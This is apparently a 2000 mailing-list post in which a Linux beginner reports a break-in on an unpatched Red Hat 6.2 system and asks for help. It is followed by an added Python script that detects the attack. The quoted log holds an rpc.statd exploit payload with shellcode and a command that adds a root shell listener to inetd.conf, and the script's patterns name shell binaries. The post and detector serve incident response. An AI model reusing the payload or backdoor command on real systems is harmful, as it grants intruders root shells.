attack

Radek Kohout Radek.Kohout at op-profashion.cz
Mon Nov 20 09:23:27 CET 2000


Good day.
So, someone has broken into my system.
Red Hat 6.2 from Computer Press, without any patches
kernel 2.2.14 -6.0.1
Excerpt from /var/log/messages
********************
Nov 19 23:04:32 kohout xntpd[9991]: kernel pll status change 89
Nov 19 23:51:47 kohout rpc.statd[333]: SM_MON request for hostname containing '/': ^D÷˙ż^D÷˙ż^E÷˙ż^E÷˙ż^F÷˙ż^F÷˙ż^G÷˙ż^G÷˙ż08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707ëK^?v?ƒî Ť^(ƒĆ ?^°ƒî Ť^.ƒĆ ƒĂ ƒë#?^´1Ŕƒî ˆF'ˆF*ƒĆ ˆF??F¸°+, ?óŤN?ŤV¸Í€1Ű?Ř@̀č°˙˙˙/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Nov 20 04:02:01 kohout anacron[3470]: Updated timestamp for job `cron.daily' to 2000-11-20
Nov 20 06:09:03 kohout xntpd[9991]: kernel pll status change 89
*******************
Did I understand correctly that they got in via rpc? What should I shut down?
Why was only one line left in /etc/inetd.conf,
*****
9704 stream tcp nowait root /bin/sh sh -i
*****
 when they wanted to append this line ( >> )?

What did they achieve by this?
Is there a server somewhere on the Internet that would scan for security holes?
(other than nessus)
I am asking the more experienced for advice.

I am a beginner in Linux security
Thanks in advance

Radek Kohout
Radek.Kohout at op-profashion.cz
0508/ 311 705
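
Added example, not part of the original post: a small Python check that flags rpc.statd SM_MON log lines like the one quoted above (oversized hostname, binary bytes, embedded shell command) and lists inetd.conf entries that start a shell directly. The function names, the length threshold, the shell list and the sample data are assumptions made for this illustration.

```python
import re

# Constructed sample input modelled on the log excerpt in the post (payload shortened).
SAMPLE_LOG = [
    "Nov 19 23:04:32 kohout xntpd[9991]: kernel pll status change 89",
    "Nov 19 23:51:47 kohout rpc.statd[333]: SM_MON request for hostname containing '/': "
    "\x04\xf7\xff\xbf08049f10 bffff754 " + "0" * 200 + "/bin/sh -c echo 9704 stream tcp "
    "nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd",
    "Nov 20 04:02:01 kohout anacron[3470]: Updated timestamp for job `cron.daily' to 2000-11-20",
]
SAMPLE_INETD = ["# constructed sample", "9704 stream tcp nowait root /bin/sh sh -i"]

STATD = re.compile(r"rpc\.statd\[\d+\]: SM_MON request for hostname containing '/': (.*)$", re.S)
SHELLS = {"/bin/sh", "/bin/bash", "/bin/csh", "/bin/ksh", "/bin/tcsh"}
MAX_HOSTNAME = 255  # assumption: a legitimate hostname is far shorter than this

def suspicious_statd(line):
    """Return reasons why an rpc.statd SM_MON log line looks like an exploit attempt."""
    m = STATD.search(line)
    if not m:
        return []
    host = m.group(1)
    reasons = []
    if len(host) > MAX_HOSTNAME:
        reasons.append("hostname longer than %d characters" % MAX_HOSTNAME)
    if any(ord(c) < 0x20 or ord(c) > 0x7e for c in host):
        reasons.append("non-printable or non-ASCII bytes in hostname")
    if re.search(r"/bin/(ba|c|k|tc)?sh\b|inetd\.conf", host):
        reasons.append("shell command or inetd.conf reference in hostname")
    return reasons

def shell_listeners(inetd_lines):
    """Return (service, user, program) for inetd entries that run a shell directly."""
    hits = []
    for raw in inetd_lines:
        fields = raw.split("#", 1)[0].split()
        # inetd.conf fields: service socket-type protocol wait user program args...
        if len(fields) >= 6 and fields[5] in SHELLS:
            hits.append((fields[0], fields[4], fields[5]))
    return hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        for reason in suspicious_statd(line):
            print("statd:", reason)
    for svc, user, prog in shell_listeners(SAMPLE_INETD):
        print("inetd: service %s runs %s as %s" % (svc, prog, user))
```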

